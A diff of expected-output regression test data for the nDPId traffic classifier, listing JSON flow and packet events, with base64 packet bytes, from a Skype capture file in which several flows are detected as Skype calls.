+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1431970698527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698527,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIalAAEAGsm7AqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9b2wAAAgQFtAEDAwUBAQgKPjJ+swAAAAAEAgAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970698661,"flow_last_seen":1431970698661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970698661,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51309,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1431970698661,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970698661,"pkt":"0NQSxnP1PBXCt3IOCABFAABAL8NAAEAGlA7AqAEilQ0gD8htNFBZKlAPAAAAALAC\/\/9ctAAAAgQFtAEDAwUBAQgKPjJ\/OAAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":2,"flow_last_seen":1431970698714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970698714,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyG0MzUGLWSpQEKASOJAD+QAAAgQFrAQCCAo\/iaNBPjJ\/OAEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":3,"flow_last_seen":1431970698714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970698714,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0OGtAAEAGi3LAqAEilQ0gD8htNFBZKlAQDM1BjIAQECxa7wAAAQEICj4yf2w\/iaNB"} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1896,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":3,"flow_last_seen":1431970699535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699535,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1tBAAEAG\/UbAqAEiUHlUXchsAbvYtBS\/AAAAALAC\/\/9X8gAAAgQFtAEDAwUBAQgKPjKCnAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970699896,"flow_last_seen":1431970699896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970699896,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1431970699896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970699896,"pkt":"0NQSxnP1PBXCt3IOCABFAABAq+JAAEAGjwvAqAEiXU\/gsMhvOKrhhkW1AAAAALAC\/\/9MqQAAAgQFtAEDAwUBAQgKPjKEAQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":2,"flow_last_seen":1431970699988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970699988,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyG99aSIL4YZFtqASOJC3HAAAAgQFrAQCCAoANM5PPjKEAQEDAwU="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":3,"flow_last_seen":1431970699988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970699988,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0MxRAAEAGB+bAqAEiXU\/gsMhvOKrhhkW2fWkiDIAQECwN6AAAAQEICj4yhFwANM5P"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970700273,"flow_last_seen":1431970700273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970700273,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51312,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1431970700273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970700273,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXG9AAEAGZ2LAqAEilQ0gD8hwNFCdm737AAAAALAC\/\/+kFAAAAgQFtAEDAwUBAQgKPjKFdwAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":1431970700316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970700316,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHC8tiDYnZu9\/KASOJDXAgAAAgQFrAQCCAo\/i4hfPjKFdwEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":3,"flow_last_seen":1431970700316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970700316,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VdAAEAG0oXAqAEilQ0gD8hwNFCdm738vLYg2YAQECwuAwAAAQEICj4yhaE\/i4hf"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701461,"flow_last_seen":1431970701461,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701461,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51313,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1431970701461,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701461,"pkt":"0NQSxnP1PBXCt3IOCABFAABABNpAAEAGl07AqAEi1KEIJMhxNFBceQzyAAAAALAC\/\/9qAAAAAgQFtAEDAwUBAQgKPjKKDQAAAAAEAgAA"} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970701508,"flow_last_seen":1431970701508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970701508,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1431970701508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970701508,"pkt":"0NQSxnP1PBXCt3IOCABFAABA+6xAAEAGP0HAqAEiXU\/gsMhyOKrDZAILAAAAALAC\/\/+oNwAAAgQFtAEDAwUBAQgKPjKKPAAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":1431970701535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701535,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHGqbrB+XHkM86ASOJCJjwAAAgQFrAQCCAo\/pB5HPjKKDQEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":3,"flow_last_seen":1431970701535,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701535,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0GjJAAEAGggLAqAEi1KEIJMhxNFBceQzzqm6wf4AQECzgbwAAAQEICj4yilc\/pB5H"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1965,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":1431970701599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970701599,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGRPJdT+CwwKgBIjiqyHKomFMrw2QCDKASOJC0yAAAAgQFrAQCCAoANM\/iPjKKPAEDAwU="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1966,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":3,"flow_last_seen":1431970701599,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970701599,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03YRAAEAGXXXAqAEiXU\/gsMhyOKrDZAIMqJhTLIAQECwLlgAAAQEICj4yipUANM\/i"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970703073,"flow_last_seen":1431970703073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970703073,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51315,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2016,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":1431970703073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970703073,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2zBAAEAGwPfAqAEi1KEIJMhzNFD26tn9AAAAALAC\/\/\/8RgAAAgQFtAEDAwUBAQgKPjKQRwAAAAAEAgAA"} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2017,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":1431970703145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970703145,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHPVGwsc9urZ\/qASOJBaugAAAgQFrAQCCAo\/nFogPjKQRwEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":3,"flow_last_seen":1431970703145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970703145,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QUdAAEAGWu3AqAEi1KEIJMhzNFD26tn+1RsLHYAQECyxnAAAAQEICj4ykI8\/nFog"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970704329,"flow_last_seen":1431970704329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970704329,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51316,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2056,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":1431970704329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970704329,"pkt":"0NQSxnP1PBXCt3IOCABFAABAHThAAEAGppnAqAEilQ0gD8h0NFB7qA8CAAAAALAC\/\/9lUQAAAgQFtAEDAwUBAQgKPjKVIwAAAAAEAgAA"} 
+00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":2,"flow_last_seen":1431970704371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970704371,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHQNAtU7e6gPA6ASOJA1ewAAAgQFrAQCCAo\/gOZ\/PjKVIwEDAwk="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":3,"flow_last_seen":1431970704371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970704371,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+SJAAEAGyrrAqAEilQ0gD8h0NFB7qA8DDQLVPIAQECyMewAAAQEICj4ylU0\/gOZ\/"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970705942,"flow_last_seen":1431970705942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970705942,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":51317,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":1431970705942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970705942,"pkt":"0NQSxnP1PBXCt3IOCABFAABAIgJAAEAGoc\/AqAEilQ0gD8h1NFDRK91BAAAAALAC\/\/87SwAAAgQFtAEDAwUBAQgKPjKbZQAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":2,"flow_last_seen":1431970705984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970705984,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQyHXO868x0SvdQqASOJBt+QAAAgQFrAQCCAo\/gOgTPjKbZQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431970705984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970705984,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iDxAAEAGO6HAqAEilQ0gD8h1NFDRK91CzvOvMoAQECzE+QAAAQEICj4ym48\/gOgT"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707102,"flow_last_seen":1431970707102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970707102,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51318,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2116,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":1431970707102,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970707102,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/2lAAEAGnL7AqAEi1KEIJMh2NFCv5GiXAAAAALAC\/\/+lEAAAAgQFtAEDAwUBAQgKPjKf5wAAAAAEAgAA"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2117,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":2,"flow_last_seen":1431970707176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970707176,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQyHapD3vnr+RomKASOJCFFQAAAgQFrAQCCAo\/p5PEPjKf5wEDAwk="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431970707911,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431970707911,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+nsAAEAR9XPAqAEihexDGTLdwCsAGiMOfdMCo1rvIegrMqRysYXm5vlz"} 
00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"} 00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
